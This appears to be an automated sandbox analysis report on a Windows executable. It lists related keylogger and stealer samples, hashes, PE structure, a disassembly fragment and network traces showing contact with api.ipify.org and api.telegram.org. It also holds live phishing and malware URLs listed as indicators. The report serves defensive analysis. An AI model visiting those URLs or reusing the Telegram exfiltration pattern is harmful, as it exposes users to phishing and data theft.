                                          • 149.154.167.220
                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          _Company.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          F.O Pump Istek,Docx.batGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          D.G Governor Istek,Docx.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake KeyloggerBrowse
                                          • 149.154.167.220
                                          Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TELEGRAMRUfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                          • 149.154.167.99
                                          9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          9KEZfGRjyK.exeGet hashmaliciousUnknownBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                          • 149.154.167.220
                                          file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                          • 149.154.167.99
                                          PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                          • 149.154.167.220
                                          66776676676.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                          • 149.154.167.220
                                          pM3fQBuTLy.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          QIo3SytSZA.exeGet hashmaliciousVidarBrowse
                                          • 149.154.167.99
                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                          • 104.21.23.76
                                          Executed_Innocap-#81(Final.pdfGet hashmaliciousUnknownBrowse
                                          • 104.21.11.54
                                          https://pass-ga.com/Get hashmaliciousUnknownBrowse
                                          • 1.1.1.1
                                          http://supplytic.ca/chuu/wpia/posha/sf_rand_string_mixed(24)/terence.tinnelly@innocapglobal.comGet hashmaliciousUnknownBrowse
                                          • 172.67.215.242
                                          la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 1.14.178.20
                                          https://workrubinnovations.com/wp-includes/kih/login.html?General=hLskkvfnVcqEPbdrK7sunT26PsAphHOxpizUKt2RC0aCijWkm4KdKAm8rk2qEAtO77hTNQ1F3KTfWtNkeEuTUzu5miygK9V9H06Get hashmaliciousHTMLPhisherBrowse
                                          • 104.17.25.14
                                          file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                          • 104.21.91.209
                                          la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                          • 104.22.149.172
                                          https://docs.google.com/presentation/d/e/2PACX-1vRbuxCSjoSTqnuwwycGfoopwUno5J5X0s9YIzYdS1Me8P6MAP3FFMvOzHT6E_SBRsWcXRtJqZiYhJR5/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                                          • 104.21.12.7
                                          http://docusign.netGet hashmaliciousUnknownBrowse
                                          • 104.18.66.57
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                          Entropy (8bit):6.585333807132694
                                          TrID:
                                          • Win64 Executable (generic) (12005/4) 74.95%
                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                          • DOS Executable Generic (2002/1) 12.50%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                          File name:c9toH15OT0.exe
                                          File size:3'121'152 bytes
                                          MD5:6a5ec7f2c5ea9831b81c7e637c5ecd9f
                                          SHA1:56eb825c85698d459605aab6d375d8680ba22402
                                          SHA256:1ce88179cf309cf721fbd5f924bbe02adf339971d4b7722facdae4b6dd8be42d
                                          SHA512:689ad53cbd71f59d27cbf15227cdb06392b74c705e7b7989fd7b8079f964edf1bf1a63c6489116624aef097dd115791909bff6eb9429f9422ffc02ee4ab269b0
                                          SSDEEP:49152:3Fw2+28ScwpSxEQMigjfP7fsf2T+VpIpJ2lEbfRwb1VItFwIU6is4Se:qNBgQTIH+s6iFP+sU
                                          TLSH:0DE57C53F29185EDC15AC0B8925BA232FA32BC8D4A35BB6B17E0C7313E65B405F1DB58
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............'.4..../................@.............................00......=0...`... ............................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x1400014d0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows cui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x66FEBFE5 [Thu Oct 3 16:01:41 2024 UTC]
                                          TLS Callbacks:0x40164a00, 0x1, 0x401d16e0, 0x1, 0x401d16b0, 0x1
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:e0632d78a7e37de8cb6c80c1d5daa041
                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [0029F725h]
                                          mov dword ptr [eax], 00000000h
                                          call 00007F54E86F919Fh
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          call 00007F54E88C8A74h
                                          dec eax
                                          cmp eax, 01h
                                          sbb eax, eax
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          lea ecx, dword ptr [00000009h]
                                          jmp 00007F54E86F94D9h
                                          nop dword ptr [eax+00h]
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          push esi
                                          push edi
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov esi, dword ptr [ecx+10h]
                                          dec eax
                                          cmp esi, FFFFFFFFh
                                          je 00007F54E86F9598h
                                          dec eax
                                          lea edx, dword ptr [ecx+10h]
                                          dec eax
                                          mov eax, dword ptr [esi]
                                          nop dword ptr [eax+eax+00h]
                                          dec eax
                                          test eax, eax
                                          je 00007F54E86F9583h
                                          js 00007F54E86F9585h
                                          dec esp
                                          lea eax, dword ptr [eax+01h]
                                          dec esp
                                          cmpxchg dword ptr [esi], eax
                                          jne 00007F54E86F94E8h
                                          mov byte ptr [ecx+41h], 00000001h
                                          mov al, 01h
                                          xchg byte ptr [ecx+40h], al
                                          test al, al
                                          jne 00007F54E86F954Dh
                                          dec eax
                                          mov dword ptr [ecx+38h], 00000000h
                                          dec eax
                                          mov eax, edx
                                          dec eax
                                          xchg dword ptr [esi+30h], eax
                                          dec eax
                                          mov dword ptr [eax+28h], edx
                                          dec eax
                                          mov eax, dword ptr [esi+28h]
                                          nop
                                          dec eax
                                          mov ecx, eax
                                          dec eax
                                          or ecx, 02h
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x2fa0000x14e4.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2fe0000x4e8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x2ce0000x8178.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ff0000x3374.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x2a08400x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x2fa5280x460.idata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x1f32680x1f34006a839fcfa006978d3bde4c1f1478ae94False0.48337643183525286data6.351726939246356IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0x1f50000x1f00x200eef19075b09a65342278d3b54677d549False0.171875data1.1981934059433288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rdata0x1f60000xd70600xd7200cfd8ae2e3803859717a78f8c84316922False0.5958256918216154OpenPGP Secret Key6.532228550617106IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .pdata0x2ce0000x81780x82004a727e2f8d24002ed4dff6e599c66e33False0.5485276442307693data6.157006052521429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .xdata0x2d70000x21ce40x21e00b3ae6394a95b05da1b567fc7b6fd3d66False0.5data5.961647368196014IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .bss0x2f90000x2600x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0x2fa0000x14e40x16007f3d57ce95d6175667d28efaf10e7eacFalse0.2995383522727273data4.245058750710776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .CRT0x2fc0000x680x20024fe230c04219594e06564ec99573fa7False0.076171875data0.38490867468301426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .tls0x2fd0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x2fe0000x4e80x6003a5735f5d36189f0a22f033ecafe1fe8False0.333984375data4.781619206170931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .reloc0x2ff0000x33740x3400cc6ba58782f6aeeaf55b3af5c5efb624False0.4075270432692308data5.453890279263294IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_MANIFEST0x2fe0580x48fXML 1.0 document, ASCII text0.40102827763496146
                                          DLLImport
                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegQueryValueExW, SystemFunction036
                                          bcrypt.dllBCryptGenRandom
                                          KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, InitializeCriticalSection, LeaveCriticalSection, RaiseException, RtlUnwindEx, VirtualProtect, VirtualQuery, __C_specific_handler
                                          msvcrt.dll__getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _fpreset, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcmp, memcpy, memmove, memset, pow, signal, strlen, strncmp, vfprintf
                                          kernel32.dllAddVectoredExceptionHandler, CloseHandle, CreateFileMappingA, CreateFileW, CreateIoCompletionPort, CreateThread, CreateToolhelp32Snapshot, DuplicateHandle, ExitProcess, FormatMessageW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentThread, GetEnvironmentVariableW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetProcessHeap, GetQueuedCompletionStatusEx, GetStartupInfoA, GetStdHandle, GetSystemInfo, GetSystemTimePreciseAsFileTime, HeapAlloc, HeapFree, HeapReAlloc, InitOnceBeginInitialize, InitOnceComplete, MapViewOfFile, Module32FirstW, Module32NextW, MultiByteToWideChar, PostQueuedCompletionStatus, QueryPerformanceCounter, QueryPerformanceFrequency, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetFileCompletionNotificationModes, SetHandleInformation, SetLastError, SetThreadStackGuarantee, SetUnhandledExceptionFilter, Sleep, SwitchToThread, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnmapViewOfFile, WaitForSingleObject, WriteConsoleW
                                          ntdll.dllNtCancelIoFileEx, NtCreateFile, NtDeviceIoControlFile, NtWriteFile, RtlNtStatusToDosError
                                          ws2_32.dllWSACleanup, WSAGetLastError, WSAIoctl, WSASend, WSASocketW, WSAStartup, bind, closesocket, connect, freeaddrinfo, getaddrinfo, getpeername, getsockname, getsockopt, ioctlsocket, recv, send, setsockopt, shutdown, socket
                                          api-ms-win-core-synch-l1-2-0.dllWaitOnAddress, WakeByAddressAll, WakeByAddressSingle
                                          bcryptprimitives.dllProcessPrng
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 20, 2024 04:20:35.914315939 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:35.914402962 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:35.914494991 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:35.914861917 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:35.914900064 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:37.133346081 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:37.135482073 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:37.135508060 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:37.136862040 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:37.136979103 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:37.138408899 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:37.138464928 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:37.138590097 CET44349730104.26.12.205192.168.2.4
                                          Dec 20, 2024 04:20:37.138644934 CET49730443192.168.2.4104.26.12.205
                                          Dec 20, 2024 04:20:37.309341908 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:37.309406996 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:37.309518099 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:37.309704065 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:37.309724092 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:38.697577953 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:38.697968006 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:38.698008060 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:38.699062109 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:38.699157953 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:38.699390888 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:38.699421883 CET49731443192.168.2.4149.154.167.220
                                          Dec 20, 2024 04:20:38.699582100 CET44349731149.154.167.220192.168.2.4
                                          Dec 20, 2024 04:20:38.699650049 CET49731443192.168.2.4149.154.167.220
                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 20, 2024 04:20:35.768138885 CET5409053192.168.2.41.1.1.1
                                          Dec 20, 2024 04:20:35.908447981 CET53540901.1.1.1192.168.2.4
                                          Dec 20, 2024 04:20:37.169575930 CET4949853192.168.2.41.1.1.1
                                          Dec 20, 2024 04:20:37.308079004 CET53494981.1.1.1192.168.2.4
                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                          Dec 20, 2024 04:20:35.768138885 CET192.168.2.41.1.1.10x1360Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                          Dec 20, 2024 04:20:37.169575930 CET192.168.2.41.1.1.10xcf10Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Dec 20, 2024 04:20:35.908447981 CET1.1.1.1192.168.2.40x1360No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                          Dec 20, 2024 04:20:35.908447981 CET1.1.1.1192.168.2.40x1360No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                          Dec 20, 2024 04:20:35.908447981 CET1.1.1.1192.168.2.40x1360No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                          Dec 20, 2024 04:20:37.308079004 CET1.1.1.1192.168.2.40xcf10No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:22:20:34
                                          Start date:19/12/2024
                                          Path:C:\Users\user\Desktop\c9toH15OT0.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\c9toH15OT0.exe"
                                          Imagebase:0x7ff654390000
                                          File size:3'121'152 bytes
                                          MD5 hash:6A5EC7F2C5EA9831B81C7E637C5ECD9F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:22:20:34
                                          Start date:19/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:2.8%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:48.6%
                                            Total number of Nodes:1609
                                            Total number of Limit Nodes:66
                                            execution_graph 61852 7ff6543b0dd1 61853 7ff6543b0df2 61852->61853 61854 7ff6543b1cc0 61853->61854 61855 7ff6543b0e39 61853->61855 61857 7ff6543b1cd5 61854->61857 61858 7ff6543b2627 61854->61858 62033 7ff65451ab60 61855->62033 62055 7ff654399ce0 55 API calls 61857->62055 62057 7ff6543bf5a0 50 API calls 61858->62057 61862 7ff6543b1cdd 61864 7ff6543b2d14 61862->61864 61868 7ff6543b0e47 61862->61868 61863 7ff6543b2d9a 61865 7ff6543bb190 50 API calls 61863->61865 62059 7ff6543bb190 61864->62059 61871 7ff6543b25a7 61865->61871 61867 7ff6543b1c21 61867->61867 61868->61867 61869 7ff6543b2593 61868->61869 61872 7ff6543b1e1b memcmp 61868->61872 62056 7ff6543bf520 50 API calls 61869->62056 61872->61868 61873 7ff6543b1e56 61872->61873 61874 7ff6543b2732 61873->61874 61879 7ff6543af672 memcpy 61873->61879 62058 7ff6543b8700 50 API calls 61874->62058 61877 7ff65449c6a0 61878 7ff6543af6a0 memcpy memcpy 61877->61878 61883 7ff6543acf93 61878->61883 61879->61877 61880 7ff6543af70c memcpy 61904 7ff654396ea0 61880->61904 61883->61880 61887 7ff6543af96d HeapFree 61894 7ff6543af961 61887->61894 61889 7ff6543af9e0 memcpy 61889->61894 61890 7ff654396ea0 86 API calls 61890->61894 61891 7ff6543afa45 memcpy memcpy memcpy 61891->61894 61892 7ff654397360 65 API calls 61892->61894 61894->61887 61894->61889 61894->61890 61894->61891 61894->61892 61895 7ff6543afbdf HeapFree 61894->61895 61896 7ff6543aff08 memcpy memcpy 61894->61896 61898 7ff6543aff56 memcpy memcpy memcpy memcpy 61894->61898 61899 7ff6545160d0 HeapAlloc 61894->61899 61900 7ff6543b011a memcmp 61894->61900 61902 7ff6543b198f HeapFree 61894->61902 61903 7ff65439b750 16 API calls 61894->61903 61939 7ff654397f10 93 API calls 61894->61939 61940 7ff65440f810 61894->61940 61968 7ff654514af0 61894->61968 61895->61896 61967 7ff654398a50 86 API calls 61896->61967 61898->61894 61899->61894 61900->61894 61902->61894 61903->61894 61905 7ff654396eb1 61904->61905 61906 7ff654396ecb 61904->61906 61912 7ff654396ec6 61905->61912 62067 7ff65440e180 61905->62067 61907 7ff654396ef3 61906->61907 61909 7ff654396ede HeapFree 61906->61909 61910 7ff654396f12 61907->61910 61911 7ff654396efd HeapFree 61907->61911 61909->61907 61913 7ff654396f19 HeapFree 61910->61913 61915 7ff654396f2b 61910->61915 61911->61910 61924 7ff6545160d0 61912->61924 61913->61915 61914 7ff654396fa3 61916 7ff654396fbe 61914->61916 61917 7ff654396fad HeapFree 61914->61917 61915->61914 61918 7ff654396f90 HeapFree 61915->61918 61919 7ff65439b750 16 API calls 61916->61919 61920 7ff654396fd7 61916->61920 61917->61916 61918->61915 61919->61920 61921 7ff654396ffd HeapFree 61920->61921 61922 7ff65439700e 61920->61922 61921->61922 61922->61912 62071 7ff654396250 63 API calls 61922->62071 61925 7ff6545160e5 HeapAlloc 61924->61925 61928 7ff6545160eb 61924->61928 61927 7ff65468a790 61925->61927 61928->61925 61929 7ff6543af750 61928->61929 61929->61894 61930 7ff65439b750 61929->61930 61931 7ff65439b769 HeapFree 61930->61931 61932 7ff65439b77e 61930->61932 61931->61932 62072 7ff654392e20 61932->62072 61934 7ff65439b7e3 61938 7ff65439b7fc 61934->61938 62085 7ff65439b590 HeapFree HeapFree HeapFree HeapFree HeapFree 61934->62085 61936 7ff65439b7a2 61936->61934 61937 7ff65439b7d2 HeapFree 61936->61937 61937->61934 61938->61894 61938->61938 61939->61894 61941 7ff6545160d0 HeapAlloc 61940->61941 61942 7ff65440f82f 61941->61942 61943 7ff65440f838 61942->61943 61944 7ff65440fc43 61942->61944 61946 7ff6545160d0 HeapAlloc 61943->61946 62135 7ff6543b57c0 61944->62135 61948 7ff65440f85b 61946->61948 61947 7ff65440fc52 61949 7ff6543b57c0 50 API calls 61947->61949 61948->61947 61950 7ff65440f864 61948->61950 61951 7ff65440fc61 61949->61951 62106 7ff65440fd40 61950->62106 62141 7ff6543e9d60 HeapFree HeapFree 61951->62141 61954 7ff65440f93d 61958 7ff65451ab60 56 API calls 61954->61958 61955 7ff65440fc63 61956 7ff6543bb190 50 API calls 61955->61956 61956->61951 61960 7ff65440f9ed 61958->61960 61962 7ff65440f9f6 61960->61962 61965 7ff6543bb190 50 API calls 61960->61965 61962->61894 61965->61951 61967->61894 61969 7ff654514b2a 61968->61969 61970 7ff654514b7d 61968->61970 62165 7ff654514610 50 API calls 61969->62165 61972 7ff654514b8e 61970->61972 61973 7ff654514c90 61970->61973 62167 7ff6544f5030 55 API calls 61972->62167 62172 7ff654514060 71 API calls 61973->62172 61975 7ff654514b2f 61975->61970 61982 7ff654514b46 61975->61982 61977 7ff654514c95 62173 7ff6544f5030 55 API calls 61977->62173 61978 7ff654514b93 61979 7ff654514b9c 61978->61979 61980 7ff654514ca3 61978->61980 61983 7ff654514bcd 61979->61983 61986 7ff654514bdf 61979->61986 62168 7ff6543bc4c0 61979->62168 61985 7ff6543bb190 50 API calls 61980->61985 61984 7ff654514b59 61982->61984 62175 7ff6544f9730 WaitOnAddress GetLastError 61982->62175 61983->61986 62174 7ff6544f9730 WaitOnAddress GetLastError 61983->62174 61987 7ff654514b71 61984->61987 62166 7ff6544f97e0 50 API calls 61984->62166 61985->61983 62161 7ff6543b95d0 61986->62161 61993 7ff6543b95d0 50 API calls 61987->61993 61995 7ff654514d25 61993->61995 61997 7ff654514d2d 61995->61997 61998 7ff654514d4f 61995->61998 61996 7ff654514c2b 61999 7ff654514c75 61996->61999 62004 7ff654514c6c WakeByAddressSingle 61996->62004 62176 7ff6544f2f60 HeapFree 61997->62176 62002 7ff654514d48 61998->62002 62177 7ff6544f2f60 HeapFree 61998->62177 62000 7ff654514c7e 61999->62000 62180 7ff6543b8690 61999->62180 62000->61894 62007 7ff654514d84 62002->62007 62178 7ff6544f97e0 50 API calls 62002->62178 62004->61999 62008 7ff654514d9c 62007->62008 62009 7ff654514d94 WakeByAddressSingle 62007->62009 62008->62000 62179 7ff654514780 HeapFree 62008->62179 62009->62008 62012 7ff654514e20 62013 7ff654514e89 62012->62013 62183 7ff654514780 HeapFree 62012->62183 62014 7ff654560750 6 API calls 62013->62014 62017 7ff654514e91 62014->62017 62016 7ff654514e6b 62018 7ff654560750 6 API calls 62016->62018 62019 7ff6543bc8c0 50 API calls 62017->62019 62020 7ff654514e73 62018->62020 62021 7ff654514e96 62019->62021 62184 7ff6543bc8c0 62020->62184 62023 7ff654514ea8 62021->62023 62187 7ff6544f2f60 HeapFree 62021->62187 62027 7ff654560750 6 API calls 62023->62027 62029 7ff654514eb9 62027->62029 62031 7ff6543bc8c0 50 API calls 62029->62031 62032 7ff654514ebe 62031->62032 62034 7ff65451ab79 TlsGetValue 62033->62034 62035 7ff65451ac2f 62033->62035 62042 7ff65451ab86 62034->62042 62334 7ff6544f4330 50 API calls 62035->62334 62037 7ff65451ab9f TlsGetValue 62041 7ff6543b0e3e 62037->62041 62044 7ff65451abb0 62037->62044 62038 7ff65451ac51 62335 7ff6544f4330 50 API calls 62038->62335 62039 7ff65451ac3b TlsGetValue 62039->62042 62041->61863 62041->61868 62042->62037 62042->62038 62042->62041 62043 7ff65451ac5d TlsGetValue 62043->62041 62043->62044 62045 7ff65451ac01 ProcessPrng 62044->62045 62046 7ff6545160d0 HeapAlloc 62044->62046 62045->62041 62047 7ff65451abcb 62046->62047 62048 7ff65451ac90 62047->62048 62049 7ff65451abd4 62047->62049 62337 7ff6543b5820 50 API calls 62048->62337 62050 7ff65451abf4 TlsSetValue 62049->62050 62336 7ff6544f4330 50 API calls 62049->62336 62050->62045 62054 7ff65451ac9f 62055->61862 62058->61871 62060 7ff6543b8690 49 API calls 62059->62060 62061 7ff6543bb210 62060->62061 62062 7ff6543bb287 62061->62062 62338 7ff6543b86f0 50 API calls 62061->62338 62062->61871 62068 7ff65440e1c2 62067->62068 62069 7ff65440e195 62067->62069 62068->61912 62069->62068 62070 7ff65440e1b1 HeapFree 62069->62070 62070->62068 62071->61912 62073 7ff654392e32 62072->62073 62086 7ff6543962e0 62073->62086 62075 7ff654392e78 62075->61936 62076 7ff65439ad67 62094 7ff6543952e0 HeapFree HeapFree 62076->62094 62078 7ff65439ad36 62078->62076 62079 7ff65439ad51 HeapFree 62078->62079 62079->62076 62080 7ff65439ad70 62095 7ff654395830 HeapFree HeapFree 62080->62095 62081 7ff654392e51 62081->62075 62081->62076 62081->62078 62083 7ff65439acff HeapFree 62081->62083 62083->62081 62084 7ff65439ad7c 62084->61936 62085->61938 62087 7ff6543962f3 62086->62087 62088 7ff654396326 62087->62088 62089 7ff65439b3c0 4 API calls 62087->62089 62090 7ff654396339 62088->62090 62096 7ff65439b3c0 62088->62096 62089->62088 62091 7ff65439634c 62090->62091 62105 7ff65439b590 HeapFree HeapFree HeapFree HeapFree HeapFree 62090->62105 62091->62081 62094->62080 62095->62084 62097 7ff65439b3d8 HeapFree 62096->62097 62098 7ff65439b3ea 62096->62098 62097->62098 62099 7ff65439b3f1 HeapFree 62098->62099 62100 7ff65439b403 62098->62100 62099->62100 62101 7ff65439b443 62100->62101 62103 7ff65439b430 HeapFree 62100->62103 62102 7ff65439b44a HeapFree 62101->62102 62104 7ff65439b45b 62101->62104 62102->62104 62103->62100 62104->62090 62105->62091 62142 7ff6544107a0 59 API calls 62106->62142 62108 7ff65440fd67 62109 7ff65440ff07 62108->62109 62111 7ff65440ff8f 62108->62111 62113 7ff65441015e 62108->62113 62115 7ff654410176 62108->62115 62119 7ff6544101af 62108->62119 62121 7ff65440feac memcmp 62108->62121 62123 7ff65440f92f 62108->62123 62145 7ff6543f0de0 53 API calls 62108->62145 62143 7ff654399b90 53 API calls 62109->62143 62144 7ff654399b90 53 API calls 62111->62144 62146 7ff6543bf520 50 API calls 62113->62146 62114 7ff65440ff61 62114->62123 62149 7ff6543b8700 50 API calls 62114->62149 62147 7ff6543b8700 50 API calls 62115->62147 62150 7ff6543b8700 50 API calls 62119->62150 62120 7ff65440fffb 62120->62123 62148 7ff6543bf520 50 API calls 